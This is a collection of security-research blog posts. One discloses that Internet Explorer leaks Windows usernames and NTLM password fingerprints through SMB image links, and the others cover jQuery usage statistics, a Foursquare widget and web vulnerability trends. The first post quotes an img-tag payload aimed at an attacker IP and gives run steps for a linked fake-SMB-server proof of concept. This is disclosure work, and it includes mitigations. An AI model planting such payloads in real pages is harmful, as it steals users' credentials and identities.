From Information to Intelligence

As part of our research on browser private mode that I presents this morning at Usenix Security, I took a look at how Internet Explorer handles SMB (Server Message Block) query. Turns out that because Internet Explorer (IE) processes SMB (Windows file sharing URL) automatically  it is possible to use the SMB protocol to identify the Internet Explorer User with 100% accuracy.

Internet Explorer uses the same rendering engine than the Windows Explorer called the Trident engine. The good part of this is that you can type a window sharing file path in your url bar like “\\myserver\mydir\myfile”, and Internet Explorer will seamlessly download it. Similarly  Internet Explorer is also able to browse Windows shared file directories in a transparent fashion.

The ugly part of this is that if an attacker include an img tag in a page that contains a SMB link like <img src=”\\attackerIP\a.jpg”>, Internet Explorer will process it and issue the SMB request without prompting the user. Why it is a bad thing ?Well if you look at the SMB specification you will see that if the server denies the SMB request the client (here IE) will  try to authenticate using a NTLM/NTLM2 challenge. The bad part for privacy it that during this challenge IE will send your Windows username, domain name, windows version and a “fingerprint” of your password (NTLM v1 only, details later in this post)

The net result of this behavior is that no matter if you are using the Inprivate mode or a HTTP proxy: the attacker knows your Windows username, domain and password fingerprint because of this request so any privacy measures on IE are useless because unless you change your windows username and password and domain/group name a remote attacker will know who you are.

I contacted Microsoft about this, they told me they were aware of the issue and it was a feature so today I am releasing the POC (download it here) I wrote to demo this. It is based on Hernan Ochoa POC for the NTLM weak nonce attack and is written in ruby. So feel free to test it

To launch it just use the standard ruby command : “ruby ./smb.rb” that is it, it will bind a fake SMB server on your computer and will listen for incoming connection. As soon as he will see one, he will deny it and at the second request give you the victim username, domain and window version.  To trigger it you can either directly type on your IE url bar “\\ipoftheserver\a.jpg” or create a page with a image link that point to your fake server ip address. The POC can be improved to have it own web server for this but I felt it was superflous. If you wrote it let me know I will be happy to update the POC

If things works correctly you will see the following output :

Three technicals notes on this attacks

1. You get only a fingerprint of the password when a NTLM v1 challenge is used (2k, XP, Vista)  because  with NTLM1 only the server (meaning my code) select a challenge which is in our case fixed. In NTLM v2 the client also choose a challenge so the fingerprint is not possible anymore so we don’t get a fingerprint for Window 7
2. While doing test over the Internet, I found out that many ISP block request on the port 445 so  in practice if you don’t have the right hosting provider you can’t make it work over the internet
3. Remember the fake smb server run on the port 445 so you need to be root to launch it.

Possible mitigations include: Microsoft restricting SMB query over local network, Firewalling outbound SMB request (always a good idea), use another browser.

By crawling Alexa top 100 000 websites I found out that 45% of them use a Javascript framework and among those who use a framework 28% of them use Jquery.

I expected that more websites will use a framework but apparently many people like to do things by hands Anyway the following chart depicts how popular each framework is:

As one can see JQuery is by far the most used framework: 63% of the Alexa top 100 000 websites that use a javascript framework, choose it.  Prototype is their second choice with almost 13%. The third and fourth frameworks,  namely YUI and Mootool are not very far from prototype: Both of them have around 9% market share.   Accordingly if you are trying to decide which framework to learn or use JQuery is without any doubt the one that you will most likely encounter while working on various web apps.

Given that JQuery is so popular, I was curious to know which version is the most used.  The result of my data mining on this is summarized on the chart below. These numbers are only an approximation because some websites strip out the version of JQuery they are using.

Beside the obvious fact that the 1.3.2 version  is by far the most popular version with 51.25% this graph tell us that people do not update their javascript framework:  the 1.2.6 version is still used by 17.4% of the websites.  The question is why ? Why not updating their framework ?  I think it is a combination of two factors: On one hand developers are afraid of breaking things by updating their framework and on the other hand they don’t see the benefits of updating it.  If anyone can come up with a better explanation or stories/facts that support this hypothesis, I will love to hear it.

Finally since JQuery comes in two flavors : the regular version and the minified version, I was curious to know how many websites optimizing their loading time by using the  minified version. The surprising answer to this question is reported in the following chart:

64% of the websites do not use a minified version of JQuery ! I don’t know for you but for me it came as a huge surprise. Why a website will use a non minifed version of JQuery in production ?

Thanks for reading this post and if you have some cool idea of statistics I should extract from the crawl database let me know

One of the coolest feature of Google Lattitude is the widget that you can add to your blog or site to display your current location. Since I am already using Foursquare, I wanted to do the same by displaying my latest check-in. Turnout that foursquare provides an API to retrieve your latest check-in details, but I couldn’t find a code to create a widget from it. To fill this gap I wrote a small PHP class that fetches check-in data from Foursquare and generate a map for it by using Google map API. Using this class you can easily generate a widget that looks like the one below in less that 5 lines of code.

Since I might not be the only one to find this useful, I made the library available from here. Once you have it downloaded you can create your own widget by adding the following code :

You should now have a fully functional widget Note that the function $fq->getMapUrl() accepts many more arguments that let you customizes even further how the map look like. The full list of arguments is available in the google doc page and in the class directly.

If you think of features that you would like to see added or if you think I should do a WordPress plugin, then let me know. I will see what I can do

Over the last few months, with Jason and Baptiste we have gathered a lot of statistics about the web security to get a better understanding of how the situation evolves and where doing research will be the most effective. While some of these statistics have already been used in  our papers or for our web security class (CS241), many of them are still undisclosed. Since this kind of statistics seems to trigger a lot of  interest based on the feedback I received while giving a talk or a lecture , I thought they will make a great first post for Inftoint reborn. Overall we gathered statistics in three different direction:  server security, browser security and web security awareness

We started with Jason by doing some data mining on the VUPEN vulnerability database to see how much “market share” the web represents. As visible in the figure below, since 2005 the number of vulnerabilities reported for web application account for at least 40% of all the vulnerabilities reported. So it is clear that the web security is a big issue and deserves a lot of attention. Moreover please  bear in mind that the vulnerabilities reported affect only browsers and mainstream web applications such as WordPress and Wikimedia which is only the tip of the iceberg. What is not accounted for in this statistic is the number of vulnerabilities found in custom web applications. It will be nice at some point to cooperate with a vulnerability scanner vendor to do some data mining as it is not uncommon for a company to have a dozen of those. Similarly It will be nice to have statistics on vulnerability found in top websites  but these statistics are very hard to collect (we are still working on it, if you have any idea how to do it efficiently shoot me an email).

For those who wonder, the spike observed in 2006 is due to the rise of XSS (Cross site scripting) and SQL injection vulnerabilities. Contrary to a popular belief, XSS vulnerability have been around for a long time before being popularized after the Internet boom. This  is clearly visible in the figure below that is based on statistics collected by Steve Christey and Robert A. Martin from the MITRE in 2007.

What we did next with Jason was to dig deeper in the VUPEN database to get a web vulnerabilities breakdown by categories. This analysis was meant to be used a baseline to build the testbed used in our paper about PCI scanners efficiency.   As expected, the popularization of XSS ans SQL injection vulnerabilities is also visible in the figure below but our number are slightly lower than the MITRE one. One explanation for this phenomena is part of the VUPEN database value is the uniqueness of each vulnerability. The VUPEN team do a great job as aggregating vulnerabilities reports. The other factor is the presence in our categorization of XCS (Cross Channel Scripting) which was not part of the MITRE categorization:

I won’t discuss to much this figure as it is already done in this paper.  For me the two important  point regarding  the evolution of web security showed by this figure is that nowadays web security is even more difficult than before. Back in 2005, web security was only about testing few vectors of attacks, mainly XSS and SQL injection. In 2010, the situation is way more complex, as the number of attack vectors exploded. For instance how many of you heard of the new attack released in May named  “Cross Site URL Hijacking“  ? In a nutshell this attack allows an attacker to know the URL parameters of a different origin by abusing the Firefox error object. While this attack might seems innocuous, it has serious privacy implications.

The fact that web security is (becoming) a very complex field  is supported by  another statistic we collected with Baptiste while building our web security testbed: webseclab. We looked at Jeremiah Grossman blog, to compute a trends on how many new web attacks vector are discovered every year. We choose to use Jeremiah data because he is doing an amazing  job as keeping track of what happen in the web security world.  As visible in the figure above, which represent the cumulative number of attack vectors discovered over the last four years, the number of vector to understand/test increase almost linearly:

The fact that the number of attack vectors increase at a steady pace pose a serious challenge. Obviously,  this steady pace  forces the community to continuously build and update tools that helps web developers detecting  if their web applications are vulnerable to these new attacks but more deeply it also poses the question of how to educate web developers. I strongly believe that education is the key to web security because every web application has it own specificity so unless web developers have a clear understanding of what an attacker can do then the problem will only get worst. As a matter of fact with this steady income of new attack vectors, even if you are able to keep track of what is going on (and this is a full time job),  assessing how serious the threat posed by new attack vector of attack  and what to do about it is next to impossible without a strong web security background.

A good example of why having a strong background in web security is important for web developers are clickjacking attacks: I recall that recently I read a blog post (I think it was one of Jeremiah’s posts) wondering if web developers were paying attention to clickjacking attacks .  Well it is obviously not the case as showed in one of our recent paper, and one reason why web developers don’t pay much attention to it is because  clickjacking attacks consequences are hard to assess without the right background. For instance how many of you knows that  you can steal the content of the framed page with a “drag-and-drop clickjacking” attack ? Speaking of this  we will demonstrate  a lot of  new attacks based on framing at the Blackhat USA  this year.

Another long lasting example that emphases that knowledge is essential to web security is CSRF attacks: Even 4 years after the media put this kind of attack under the spotlight there is still people wondering if it is really dangerous.  If you still don’t believe that it is dangerous, ask the people who had their Gmail account backdoored.

To end up this post on a bright note, with Baptiste we looked at the number of web trainings proposed at the Blackhat. We choose to look at these trainings because it shows the willingness of companies to invest in web security education. Turnout that over the last two years, as visible in the figure below, the number of training proposed literally exploded. This support the hypothesis that web security education is important and people are aware of it.